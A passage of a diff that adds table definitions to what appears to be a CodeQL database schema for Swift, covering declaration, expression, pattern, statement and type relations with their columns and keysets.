@associated_type_decl +); + +concrete_var_decls( //dir=decl + unique int id: @concrete_var_decl, + int introducer_int: int ref +); + +generic_type_param_decls( //dir=decl + unique int id: @generic_type_param_decl +); + +named_functions( //dir=decl + unique int id: @named_function +); + +@nominal_type_decl = + @class_decl +| @enum_decl +| @protocol_decl +| @struct_decl +; + +#keyset[id] +nominal_type_decls( //dir=decl + int id: @nominal_type_decl ref, + int type_: @type_or_none ref +); + +opaque_type_decls( //dir=decl + unique int id: @opaque_type_decl, + int naming_declaration: @value_decl_or_none ref +); + +#keyset[id, index] +opaque_type_decl_opaque_generic_params( //dir=decl + int id: @opaque_type_decl ref, + int index: int ref, + int opaque_generic_param: @generic_type_param_type_or_none ref +); + +param_decls( //dir=decl + unique int id: @param_decl +); + +#keyset[id] +param_decl_is_inout( //dir=decl + int id: @param_decl ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_var_bindings( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_vars( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var: @var_decl_or_none ref +); + +type_alias_decls( //dir=decl + unique int id: @type_alias_decl, + int aliased_type: @type_or_none ref +); + +class_decls( //dir=decl + unique int id: @class_decl +); + +enum_decls( //dir=decl + unique int id: @enum_decl +); + +protocol_decls( //dir=decl + unique int id: @protocol_decl +); + +struct_decls( //dir=decl + unique int id: @struct_decl +); + +arguments( //dir=expr + unique int id: @argument, + string label: string ref, + int expr: @expr_or_none ref +); + +@expr = + @any_try_expr +| @applied_property_wrapper_expr +| @apply_expr +| @assign_expr +| @bind_optional_expr +| @capture_list_expr +| @closure_expr +| @collection_expr +| @consume_expr +| @copy_expr +| @decl_ref_expr +| @default_argument_expr +| @discard_assignment_expr +| @dot_syntax_base_ignored_expr +| @dynamic_type_expr +| @enum_is_case_expr +| @error_expr +| @explicit_cast_expr +| @force_value_expr +| @identity_expr +| @if_expr +| @implicit_conversion_expr +| @in_out_expr +| @key_path_application_expr +| @key_path_dot_expr +| @key_path_expr +| @lazy_initialization_expr +| @literal_expr +| @lookup_expr +| @make_temporarily_escapable_expr +| @materialize_pack_expr +| @obj_c_selector_expr +| @one_way_expr +| @opaque_value_expr +| @open_existential_expr +| @optional_evaluation_expr +| @other_initializer_ref_expr +| @overloaded_decl_ref_expr +| @pack_element_expr +| @pack_expansion_expr +| @property_wrapper_value_placeholder_expr +| @rebind_self_in_initializer_expr +| @sequence_expr +| @single_value_stmt_expr +| @super_ref_expr +| @tap_expr +| @tuple_element_expr +| @tuple_expr +| @type_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @vararg_expansion_expr +; + +#keyset[id] +expr_types( //dir=expr + int id: @expr ref, + int type_: @type_or_none ref +); + +@any_try_expr = + @force_try_expr +| @optional_try_expr +| @try_expr +; + +#keyset[id] +any_try_exprs( //dir=expr + int id: @any_try_expr ref, + int sub_expr: @expr_or_none ref +); + +applied_property_wrapper_exprs( //dir=expr + unique int id: @applied_property_wrapper_expr, + int kind: int ref, + int value: @expr_or_none ref, + int param: @param_decl_or_none ref +); + +@apply_expr = + @binary_expr +| @call_expr +| @postfix_unary_expr +| @prefix_unary_expr +| @self_apply_expr +; + +#keyset[id] +apply_exprs( //dir=expr + int id: @apply_expr ref, + int function: @expr_or_none ref +); + +#keyset[id, index] +apply_expr_arguments( //dir=expr + int id: @apply_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +assign_exprs( //dir=expr + unique int id: @assign_expr, + int dest: @expr_or_none ref, + int source: @expr_or_none ref +); + +bind_optional_exprs( //dir=expr + unique int id: @bind_optional_expr, + int sub_expr: @expr_or_none ref +); + +capture_list_exprs( //dir=expr + unique int id: @capture_list_expr, + int closure_body: @closure_expr_or_none ref +); + +#keyset[id, index] +capture_list_expr_binding_decls( //dir=expr + int id: @capture_list_expr ref, + int index: int ref, + int binding_decl: @pattern_binding_decl_or_none ref +); + +@closure_expr = + @auto_closure_expr +| @explicit_closure_expr +; + +@collection_expr = + @array_expr +| @dictionary_expr +; + +consume_exprs( //dir=expr + unique int id: @consume_expr, + int sub_expr: @expr_or_none ref +); + +copy_exprs( //dir=expr + unique int id: @copy_expr, + int sub_expr: @expr_or_none ref +); + +decl_ref_exprs( //dir=expr + unique int id: @decl_ref_expr, + int decl: @decl_or_none ref +); + +#keyset[id, index] +decl_ref_expr_replacement_types( //dir=expr + int id: @decl_ref_expr ref, + int index: int ref, + int replacement_type: @type_or_none ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_ordinary_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +default_argument_exprs( //dir=expr + unique int id: @default_argument_expr, + int param_decl: @param_decl_or_none ref, + int param_index: int ref +); + +#keyset[id] +default_argument_expr_caller_side_defaults( //dir=expr + int id: @default_argument_expr ref, + int caller_side_default: @expr_or_none ref +); + +discard_assignment_exprs( //dir=expr + unique int id: @discard_assignment_expr +); + +dot_syntax_base_ignored_exprs( //dir=expr + unique int id: @dot_syntax_base_ignored_expr, + int qualifier: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +dynamic_type_exprs( //dir=expr + unique int id: @dynamic_type_expr, + int base: @expr_or_none ref +); + +enum_is_case_exprs( //dir=expr + unique int id: @enum_is_case_expr, + int sub_expr: @expr_or_none ref, + int element: @enum_element_decl_or_none ref +); + +error_exprs( //dir=expr + unique int id: @error_expr +); + +@explicit_cast_expr = + @checked_cast_expr +| @coerce_expr +; + +#keyset[id] +explicit_cast_exprs( //dir=expr + int id: @explicit_cast_expr ref, + int sub_expr: @expr_or_none ref +); + +force_value_exprs( //dir=expr + unique int id: @force_value_expr, + int sub_expr: @expr_or_none ref +); + +@identity_expr = + @await_expr +| @borrow_expr +| @dot_self_expr +| @paren_expr +| @unresolved_member_chain_result_expr +; + +#keyset[id] +identity_exprs( //dir=expr + int id: @identity_expr ref, + int sub_expr: @expr_or_none ref +); + +if_exprs( //dir=expr + unique int id: @if_expr, + int condition: @expr_or_none ref, + int then_expr: @expr_or_none ref, + int else_expr: @expr_or_none ref +); + +@implicit_conversion_expr = + @abi_safe_conversion_expr +| @any_hashable_erasure_expr +| @archetype_to_super_expr +| @array_to_pointer_expr +| @bridge_from_obj_c_expr +| @bridge_to_obj_c_expr +| @class_metatype_to_object_expr +| @collection_upcast_conversion_expr +| @conditional_bridge_from_obj_c_expr +| @covariant_function_conversion_expr +| @covariant_return_conversion_expr +| @derived_to_base_expr +| @destructure_tuple_expr +| @differentiable_function_expr +| @differentiable_function_extract_original_expr +| @erasure_expr +| @existential_metatype_to_object_expr +| @foreign_object_conversion_expr +| @function_conversion_expr +| @in_out_to_pointer_expr +| @inject_into_optional_expr +| @linear_function_expr +| @linear_function_extract_original_expr +| @linear_to_differentiable_function_expr +| @load_expr +| @metatype_conversion_expr +| @pointer_to_pointer_expr +| @protocol_metatype_to_object_expr +| @string_to_pointer_expr +| @underlying_to_opaque_expr +| @unevaluated_instance_expr +| @unresolved_type_conversion_expr +; + +#keyset[id] +implicit_conversion_exprs( //dir=expr + int id: @implicit_conversion_expr ref, + int sub_expr: @expr_or_none ref +); + +in_out_exprs( //dir=expr + unique int id: @in_out_expr, + int sub_expr: @expr_or_none ref +); + +key_path_application_exprs( //dir=expr + unique int id: @key_path_application_expr, + int base: @expr_or_none ref, + int key_path: @expr_or_none ref +); + +key_path_dot_exprs( //dir=expr + unique int id: @key_path_dot_expr +); + +key_path_exprs( //dir=expr + unique int id: @key_path_expr +); + +#keyset[id] +key_path_expr_roots( //dir=expr + int id: @key_path_expr ref, + int root: @type_repr_or_none ref +); + +#keyset[id, index] +key_path_expr_components( //dir=expr + int id: @key_path_expr ref, + int index: int ref, + int component: @key_path_component_or_none ref +); + +lazy_initialization_exprs( //dir=expr + unique int id: @lazy_initialization_expr, + int sub_expr: @expr_or_none ref +); + +@literal_expr = + @builtin_literal_expr +| @interpolated_string_literal_expr +| @nil_literal_expr +| @object_literal_expr +| @regex_literal_expr +; + +@lookup_expr = + @dynamic_lookup_expr +| @member_ref_expr +| @subscript_expr +; + +#keyset[id] +lookup_exprs( //dir=expr + int id: @lookup_expr ref, + int base: @expr_or_none ref +); + +#keyset[id] +lookup_expr_members( //dir=expr + int id: @lookup_expr ref, + int member: @decl_or_none ref +); + +make_temporarily_escapable_exprs( //dir=expr + unique int id: @make_temporarily_escapable_expr, + int escaping_closure: @opaque_value_expr_or_none ref, + int nonescaping_closure: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +materialize_pack_exprs( //dir=expr + unique int id: @materialize_pack_expr, + int sub_expr: @expr_or_none ref +); + +obj_c_selector_exprs( //dir=expr + unique int id: @obj_c_selector_expr, + int sub_expr: @expr_or_none ref, + int method: @function_or_none ref +); + +one_way_exprs( //dir=expr + unique int id: @one_way_expr, + int sub_expr: @expr_or_none ref +); + +opaque_value_exprs( //dir=expr + unique int id: @opaque_value_expr +); + +open_existential_exprs( //dir=expr + unique int id: @open_existential_expr, + int sub_expr: @expr_or_none ref, + int existential: @expr_or_none ref, + int opaque_expr: @opaque_value_expr_or_none ref +); + +optional_evaluation_exprs( //dir=expr + unique int id: @optional_evaluation_expr, + int sub_expr: @expr_or_none ref +); + +other_initializer_ref_exprs( //dir=expr + unique int id: @other_initializer_ref_expr, + int initializer: @initializer_or_none ref +); + +overloaded_decl_ref_exprs( //dir=expr + unique int id: @overloaded_decl_ref_expr +); + +#keyset[id, index] +overloaded_decl_ref_expr_possible_declarations( //dir=expr + int id: @overloaded_decl_ref_expr ref, + int index: int ref, + int possible_declaration: @value_decl_or_none ref +); + +pack_element_exprs( //dir=expr + unique int id: @pack_element_expr, + int sub_expr: @expr_or_none ref +); + +pack_expansion_exprs( //dir=expr + unique int id: @pack_expansion_expr, + int pattern_expr: @expr_or_none ref +); + +property_wrapper_value_placeholder_exprs( //dir=expr + unique int id: @property_wrapper_value_placeholder_expr, + int placeholder: @opaque_value_expr_or_none ref +); + +#keyset[id] +property_wrapper_value_placeholder_expr_wrapped_values( //dir=expr + int id: @property_wrapper_value_placeholder_expr ref, + int wrapped_value: @expr_or_none ref +); + +rebind_self_in_initializer_exprs( //dir=expr + unique int id: @rebind_self_in_initializer_expr, + int sub_expr: @expr_or_none ref, + int self: @var_decl_or_none ref +); + +sequence_exprs( //dir=expr + unique int id: @sequence_expr +); + +#keyset[id, index] +sequence_expr_elements( //dir=expr + int id: @sequence_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +single_value_stmt_exprs( //dir=expr + unique int id: @single_value_stmt_expr, + int stmt: @stmt_or_none ref +); + +super_ref_exprs( //dir=expr + unique int id: @super_ref_expr, + int self: @var_decl_or_none ref +); + +tap_exprs( //dir=expr + unique int id: @tap_expr, + int body: @brace_stmt_or_none ref, + int var: @var_decl_or_none ref +); + +#keyset[id] +tap_expr_sub_exprs( //dir=expr + int id: @tap_expr ref, + int sub_expr: @expr_or_none ref +); + +tuple_element_exprs( //dir=expr + unique int id: @tuple_element_expr, + int sub_expr: @expr_or_none ref, + int index: int ref +); + +tuple_exprs( //dir=expr + unique int id: @tuple_expr +); + +#keyset[id, index] +tuple_expr_elements( //dir=expr + int id: @tuple_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +type_exprs( //dir=expr + unique int id: @type_expr +); + +#keyset[id] +type_expr_type_reprs( //dir=expr + int id: @type_expr ref, + int type_repr: @type_repr_or_none ref +); + +unresolved_decl_ref_exprs( //dir=expr + unique int id: @unresolved_decl_ref_expr +); + +#keyset[id] +unresolved_decl_ref_expr_names( //dir=expr + int id: @unresolved_decl_ref_expr ref, + string name: string ref +); + +unresolved_dot_exprs( //dir=expr + unique int id: @unresolved_dot_expr, + int base: @expr_or_none ref, + string name: string ref +); + +unresolved_member_exprs( //dir=expr + unique int id: @unresolved_member_expr, + string name: string ref +); + +unresolved_pattern_exprs( //dir=expr + unique int id: @unresolved_pattern_expr, + int sub_pattern: @pattern_or_none ref +); + +unresolved_specialize_exprs( //dir=expr + unique int id: @unresolved_specialize_expr, + int sub_expr: @expr_or_none ref +); + +vararg_expansion_exprs( //dir=expr + unique int id: @vararg_expansion_expr, + int sub_expr: @expr_or_none ref +); + +abi_safe_conversion_exprs( //dir=expr + unique int id: @abi_safe_conversion_expr +); + +any_hashable_erasure_exprs( //dir=expr + unique int id: @any_hashable_erasure_expr +); + +archetype_to_super_exprs( //dir=expr + unique int id: @archetype_to_super_expr +); + +array_exprs( //dir=expr + unique int id: @array_expr +); + +#keyset[id, index] +array_expr_elements( //dir=expr + int id: @array_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +array_to_pointer_exprs( //dir=expr + unique int id: @array_to_pointer_expr +); + +auto_closure_exprs( //dir=expr + unique int id: @auto_closure_expr +); + +await_exprs( //dir=expr + unique int id: @await_expr +); + +binary_exprs( //dir=expr + unique int id: @binary_expr +); + +borrow_exprs( //dir=expr + unique int id: @borrow_expr +); + +bridge_from_obj_c_exprs( //dir=expr + unique int id: @bridge_from_obj_c_expr +); + +bridge_to_obj_c_exprs( //dir=expr + unique int id: @bridge_to_obj_c_expr +); + +@builtin_literal_expr = + @boolean_literal_expr +| @magic_identifier_literal_expr +| @number_literal_expr +| @string_literal_expr +; + +call_exprs( //dir=expr + unique int id: @call_expr +); + +@checked_cast_expr = + @conditional_checked_cast_expr +| @forced_checked_cast_expr +| @is_expr +; + +class_metatype_to_object_exprs( //dir=expr + unique int id: @class_metatype_to_object_expr +); + +coerce_exprs( //dir=expr + unique int id: @coerce_expr +); + +collection_upcast_conversion_exprs( //dir=expr + unique int id: @collection_upcast_conversion_expr +); + +conditional_bridge_from_obj_c_exprs( //dir=expr + unique int id: @conditional_bridge_from_obj_c_expr +); + +covariant_function_conversion_exprs( //dir=expr + unique int id: @covariant_function_conversion_expr +); + +covariant_return_conversion_exprs( //dir=expr + unique int id: @covariant_return_conversion_expr +); + +derived_to_base_exprs( //dir=expr + unique int id: @derived_to_base_expr +); + +destructure_tuple_exprs( //dir=expr + unique int id: @destructure_tuple_expr +); + +dictionary_exprs( //dir=expr + unique int id: @dictionary_expr +); + +#keyset[id, index] +dictionary_expr_elements( //dir=expr + int id: @dictionary_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +differentiable_function_exprs( //dir=expr + unique int id: @differentiable_function_expr +); + +differentiable_function_extract_original_exprs( //dir=expr + unique int id: @differentiable_function_extract_original_expr +); + +dot_self_exprs( //dir=expr + unique int id: @dot_self_expr +); + +@dynamic_lookup_expr = + @dynamic_member_ref_expr +| @dynamic_subscript_expr +; + +erasure_exprs( //dir=expr + unique int id: @erasure_expr +); + +existential_metatype_to_object_exprs( //dir=expr + unique int id: @existential_metatype_to_object_expr +); + +explicit_closure_exprs( //dir=expr + unique int id: @explicit_closure_expr +); + +force_try_exprs( //dir=expr + unique int id: @force_try_expr +); + +foreign_object_conversion_exprs( //dir=expr + unique int id: @foreign_object_conversion_expr +); + +function_conversion_exprs( //dir=expr + unique int id: @function_conversion_expr +); + +in_out_to_pointer_exprs( //dir=expr + unique int id: @in_out_to_pointer_expr +); + +inject_into_optional_exprs( //dir=expr + unique int id: @inject_into_optional_expr +); + +interpolated_string_literal_exprs( //dir=expr + unique int id: @interpolated_string_literal_expr +); + +#keyset[id] +interpolated_string_literal_expr_interpolation_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int interpolation_expr: @opaque_value_expr_or_none ref +); + +#keyset[id] +interpolated_string_literal_expr_appending_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int appending_expr: @tap_expr_or_none ref +); + +linear_function_exprs( //dir=expr + unique int id: @linear_function_expr +); + +linear_function_extract_original_exprs( //dir=expr + unique int id: @linear_function_extract_original_expr +); + +linear_to_differentiable_function_exprs( //dir=expr + unique int id: @linear_to_differentiable_function_expr +); + +load_exprs( //dir=expr + unique int id: @load_expr +); + +member_ref_exprs( //dir=expr + unique int id: @member_ref_expr +); + +#keyset[id] +member_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_ordinary_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @member_ref_expr ref +); + +metatype_conversion_exprs( //dir=expr + unique int id: @metatype_conversion_expr +); + +nil_literal_exprs( //dir=expr + unique int id: @nil_literal_expr +); + +object_literal_exprs( //dir=expr + unique int id: @object_literal_expr, + int kind: int ref +); + +#keyset[id, index] +object_literal_expr_arguments( //dir=expr + int id: @object_literal_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +optional_try_exprs( //dir=expr + unique int id: @optional_try_expr +); + +paren_exprs( //dir=expr + unique int id: @paren_expr +); + +pointer_to_pointer_exprs( //dir=expr + unique int id: @pointer_to_pointer_expr +); + +postfix_unary_exprs( //dir=expr + unique int id: @postfix_unary_expr +); + +prefix_unary_exprs( //dir=expr + unique int id: @prefix_unary_expr +); + +protocol_metatype_to_object_exprs( //dir=expr + unique int id: @protocol_metatype_to_object_expr +); + +regex_literal_exprs( //dir=expr + unique int id: @regex_literal_expr, + string pattern: string ref, + int version: int ref +); + +@self_apply_expr = + @dot_syntax_call_expr +| @initializer_ref_call_expr +; + +#keyset[id] +self_apply_exprs( //dir=expr + int id: @self_apply_expr ref, + int base: @expr_or_none ref +); + +string_to_pointer_exprs( //dir=expr + unique int id: @string_to_pointer_expr +); + +subscript_exprs( //dir=expr + unique int id: @subscript_expr +); + +#keyset[id, index] +subscript_expr_arguments( //dir=expr + int id: @subscript_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +#keyset[id] +subscript_expr_has_direct_to_storage_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_ordinary_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_distributed_thunk_semantics( //dir=expr + int id: @subscript_expr ref +); + +try_exprs( //dir=expr + unique int id: @try_expr +); + +underlying_to_opaque_exprs( //dir=expr + unique int id: @underlying_to_opaque_expr +); + +unevaluated_instance_exprs( //dir=expr + unique int id: @unevaluated_instance_expr +); + +unresolved_member_chain_result_exprs( //dir=expr + unique int id: @unresolved_member_chain_result_expr +); + +unresolved_type_conversion_exprs( //dir=expr + unique int id: @unresolved_type_conversion_expr +); + +boolean_literal_exprs( //dir=expr + unique int id: @boolean_literal_expr, + boolean value: boolean ref +); + +conditional_checked_cast_exprs( //dir=expr + unique int id: @conditional_checked_cast_expr +); + +dot_syntax_call_exprs( //dir=expr + unique int id: @dot_syntax_call_expr +); + +dynamic_member_ref_exprs( //dir=expr + unique int id: @dynamic_member_ref_expr +); + +dynamic_subscript_exprs( //dir=expr + unique int id: @dynamic_subscript_expr +); + +forced_checked_cast_exprs( //dir=expr + unique int id: @forced_checked_cast_expr +); + +initializer_ref_call_exprs( //dir=expr + unique int id: @initializer_ref_call_expr +); + +is_exprs( //dir=expr + unique int id: @is_expr +); + +magic_identifier_literal_exprs( //dir=expr + unique int id: @magic_identifier_literal_expr, + string kind: string ref +); + +@number_literal_expr = + @float_literal_expr +| @integer_literal_expr +; + +string_literal_exprs( //dir=expr + unique int id: @string_literal_expr, + string value: string ref +); + +float_literal_exprs( //dir=expr + unique int id: @float_literal_expr, + string string_value: string ref +); + +integer_literal_exprs( //dir=expr + unique int id: @integer_literal_expr, + string string_value: string ref +); + +@pattern = + @any_pattern +| @binding_pattern +| @bool_pattern +| @enum_element_pattern +| @expr_pattern +| @is_pattern +| @named_pattern +| @optional_some_pattern +| @paren_pattern +| @tuple_pattern +| @typed_pattern +; + +#keyset[id] +pattern_types( //dir=pattern + int id: @pattern ref, + int type_: @type_or_none ref +); + +any_patterns( //dir=pattern + unique int id: @any_pattern +); + +binding_patterns( //dir=pattern + unique int id: @binding_pattern, + int sub_pattern: @pattern_or_none ref +); + +bool_patterns( //dir=pattern + unique int id: @bool_pattern, + boolean value: boolean ref +); + +enum_element_patterns( //dir=pattern + unique int id: @enum_element_pattern, + int element: @enum_element_decl_or_none ref +); + +#keyset[id] +enum_element_pattern_sub_patterns( //dir=pattern + int id: @enum_element_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +expr_patterns( //dir=pattern + unique int id: @expr_pattern, + int sub_expr: @expr_or_none ref +); + +is_patterns( //dir=pattern + unique int id: @is_pattern +); + +#keyset[id] +is_pattern_cast_type_reprs( //dir=pattern + int id: @is_pattern ref, + int cast_type_repr: @type_repr_or_none ref +); + +#keyset[id] +is_pattern_sub_patterns( //dir=pattern + int id: @is_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +named_patterns( //dir=pattern + unique int id: @named_pattern, + int var_decl: @var_decl_or_none ref +); + +optional_some_patterns( //dir=pattern + unique int id: @optional_some_pattern, + int sub_pattern: @pattern_or_none ref +); + +paren_patterns( //dir=pattern + unique int id: @paren_pattern, + int sub_pattern: @pattern_or_none ref +); + +tuple_patterns( //dir=pattern + unique int id: @tuple_pattern +); + +#keyset[id, index] +tuple_pattern_elements( //dir=pattern + int id: @tuple_pattern ref, + int index: int ref, + int element: @pattern_or_none ref +); + +typed_patterns( //dir=pattern + unique int id: @typed_pattern, + int sub_pattern: @pattern_or_none ref +); + +#keyset[id] +typed_pattern_type_reprs( //dir=pattern + int id: @typed_pattern ref, + int type_repr: @type_repr_or_none ref +); + +case_label_items( //dir=stmt + unique int id: @case_label_item, + int pattern: @pattern_or_none ref +); + +#keyset[id] +case_label_item_guards( //dir=stmt + int id: @case_label_item ref, + int guard: @expr_or_none ref +); + +condition_elements( //dir=stmt + unique int id: @condition_element +); + +#keyset[id] +condition_element_booleans( //dir=stmt + int id: @condition_element ref, + int boolean_: @expr_or_none ref +); + +#keyset[id] +condition_element_patterns( //dir=stmt + int id: @condition_element ref, + int pattern: @pattern_or_none ref +); + +#keyset[id] +condition_element_initializers( //dir=stmt + int id: @condition_element ref, + int initializer: @expr_or_none ref +); + +#keyset[id] +condition_element_availabilities( //dir=stmt + int id: @condition_element ref, + int availability: @availability_info_or_none ref +); + +@stmt = + @brace_stmt +| @break_stmt +| @case_stmt +| @continue_stmt +| @defer_stmt +| @discard_stmt +| @fail_stmt +| @fallthrough_stmt +| @labeled_stmt +| @pound_assert_stmt +| @return_stmt +| @then_stmt +| @throw_stmt +| @yield_stmt +; + +stmt_conditions( //dir=stmt + unique int id: @stmt_condition +); + +#keyset[id, index] +stmt_condition_elements( //dir=stmt + int id: @stmt_condition ref, + int index: int ref, + int element: @condition_element_or_none ref +); + +brace_stmts( //dir=stmt + unique int id: @brace_stmt +); + +#keyset[id, index] +brace_stmt_elements( //dir=stmt + int id: @brace_stmt ref, + int index: int ref, + int element: @ast_node_or_none ref +); + +break_stmts( //dir=stmt + unique int id: @break_stmt +); + +#keyset[id] +break_stmt_target_names( //dir=stmt + int id: @break_stmt ref, + string target_name: string ref +); + +#keyset[id] +break_stmt_targets( //dir=stmt + int id: @break_stmt ref, + int target: @stmt_or_none ref +); + +case_stmts( //dir=stmt + unique int id: @case_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +case_stmt_labels( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int label: @case_label_item_or_none ref +); + +#keyset[id, index] +case_stmt_variables( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +continue_stmts( //dir=stmt + unique int id: @continue_stmt +); + +#keyset[id] +continue_stmt_target_names( //dir=stmt + int id: @continue_stmt ref, + string target_name: string ref +); + +#keyset[id] +continue_stmt_targets( //dir=stmt + int id: @continue_stmt ref, + int target: @stmt_or_none ref +); + +defer_stmts( //dir=stmt + unique int id: @defer_stmt, + int body: @brace_stmt_or_none ref +); + +discard_stmts( //dir=stmt + unique int id: @discard_stmt, + int sub_expr: @expr_or_none ref +); + +fail_stmts( //dir=stmt + unique int id: @fail_stmt +); + +fallthrough_stmts( //dir=stmt + unique int id: @fallthrough_stmt, + int fallthrough_source: @case_stmt_or_none ref, + int fallthrough_dest: @case_stmt_or_none ref +); + +@labeled_stmt = + @do_catch_stmt +| @do_stmt +| @for_each_stmt +| @labeled_conditional_stmt +| @repeat_while_stmt +| @switch_stmt +; + +#keyset[id] +labeled_stmt_labels( //dir=stmt + int id: @labeled_stmt ref, + string label: string ref +); + +pound_assert_stmts( //dir=stmt + unique int id: @pound_assert_stmt, + int condition: @expr_or_none ref, + string message: string ref +); + +return_stmts( //dir=stmt + unique int id: @return_stmt +); + +#keyset[id] +return_stmt_results( //dir=stmt + int id: @return_stmt ref, + int result: @expr_or_none ref +); + +then_stmts( //dir=stmt + unique int id: @then_stmt, + int result: @expr_or_none ref +); + +throw_stmts( //dir=stmt + unique int id: @throw_stmt, + int sub_expr: @expr_or_none ref +); + +yield_stmts( //dir=stmt + unique int id: @yield_stmt +); + +#keyset[id, index] +yield_stmt_results( //dir=stmt + int id: @yield_stmt ref, + int index: int ref, + int result: @expr_or_none ref +); + +do_catch_stmts( //dir=stmt + unique int id: @do_catch_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +do_catch_stmt_catches( //dir=stmt + int id: @do_catch_stmt ref, + int index: int ref, + int catch: @case_stmt_or_none ref +); + +do_stmts( //dir=stmt + unique int id: @do_stmt, + int body: @brace_stmt_or_none ref +); + +for_each_stmts( //dir=stmt + unique int id: @for_each_stmt, + int pattern: @pattern_or_none ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +for_each_stmt_variables( //dir=stmt + int id: @for_each_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +#keyset[id] +for_each_stmt_wheres( //dir=stmt + int id: @for_each_stmt ref, + int where: @expr_or_none ref +); + +#keyset[id] +for_each_stmt_iterator_vars( //dir=stmt + int id: @for_each_stmt ref, + int iteratorVar: @pattern_binding_decl_or_none ref +); + +#keyset[id] +for_each_stmt_next_calls( //dir=stmt + int id: @for_each_stmt ref, + int nextCall: @expr_or_none ref +); + +@labeled_conditional_stmt = + @guard_stmt +| @if_stmt +| @while_stmt +; + +#keyset[id] +labeled_conditional_stmts( //dir=stmt + int id: @labeled_conditional_stmt ref, + int condition: @stmt_condition_or_none ref +); + +repeat_while_stmts( //dir=stmt + unique int id: @repeat_while_stmt, + int condition: @expr_or_none ref, + int body: @stmt_or_none ref +); + +switch_stmts( //dir=stmt + unique int id: @switch_stmt, + int expr: @expr_or_none ref +); + +#keyset[id, index] +switch_stmt_cases( //dir=stmt + int id: @switch_stmt ref, + int index: int ref, + int case_: @case_stmt_or_none ref +); + +guard_stmts( //dir=stmt + unique int id: @guard_stmt, + int body: @brace_stmt_or_none ref +); + +if_stmts( //dir=stmt + unique int id: @if_stmt, + int then: @stmt_or_none ref +); + +#keyset[id] +if_stmt_elses( //dir=stmt + int id: @if_stmt ref, + int else: @stmt_or_none ref +); + +while_stmts( //dir=stmt + unique int id: @while_stmt, + int body: @stmt_or_none ref +); + +@type = + @any_function_type +| @any_generic_type +| @any_metatype_type +| @builtin_type +| @dependent_member_type +| @dynamic_self_type +| @error_type +| @existential_type +| @in_out_type +| @l_value_type +| @module_type +| @pack_element_type +| @pack_expansion_type +| @pack_type +| @parameterized_protocol_type +| @protocol_composition_type +| @reference_storage_type +| @substitutable_type +| @sugar_type +| @tuple_type +| @unresolved_type +; + +#keyset[id] +types( //dir=type + int id: @type ref, + string name: string ref, + int canonical_type: @type_or_none ref +); + +type_reprs( //dir=type + unique int id: @type_repr, + int type_: @type_or_none ref +); + +@any_function_type = + @function_type +| @generic_function_type +; + +#keyset[id] +any_function_types( //dir=type + int id: @any_function_type ref, + int result: @type_or_none ref +); + +#keyset[id, index] +any_function_type_param_types( //dir=type + int id: @any_function_type ref, + int index: int ref, + int param_type: @type_or_none ref +); + +#keyset[id] +any_function_type_is_throwing( //dir=type + int id: @any_function_type ref +); + +#keyset[id] +any_function_type_is_async( //dir=type + int id: @any_function_type ref +); + +@any_generic_type = + @nominal_or_bound_generic_nominal_type +| @unbound_generic_type +; + +#keyset[id] +any_generic_types( //dir=type + int id: @any_generic_type ref, + int declaration: @generic_type_decl_or_none ref +); + +#keyset[id] +any_generic_type_parents( //dir=type + int id: @any_generic_type ref, + int parent: @type_or_none ref +); + +@any_metatype_type = + @existential_metatype_type +| @metatype_type +; + +@builtin_type = + @any_builtin_integer_type +| @builtin_bridge_object_type +| @builtin_default_actor_storage_type +| @builtin_executor_type +| @builtin_float_type +| @builtin_job_type +| @builtin_native_object_type +| @builtin_raw_pointer_type +| @builtin_raw_unsafe_continuation_type +| @builtin_unsafe_value_buffer_type +| @builtin_vector_type +; + +dependent_member_types( //dir=type + unique int id: @dependent_member_type, + int base_type: @type_or_none ref, + int associated_type_decl: @associated_type_decl_or_none ref +); + +dynamic_self_types( //dir=type + unique int id: @dynamic_self_type, + int static_self_type: @type_or_none ref +); + +error_types( //dir=type + unique int id: @error_type +); + +existential_types( //dir=type + unique int id: @existential_type, + int constraint: @type_or_none ref +); + +in_out_types( //dir=type + unique int id: @in_out_type, + int object_type: 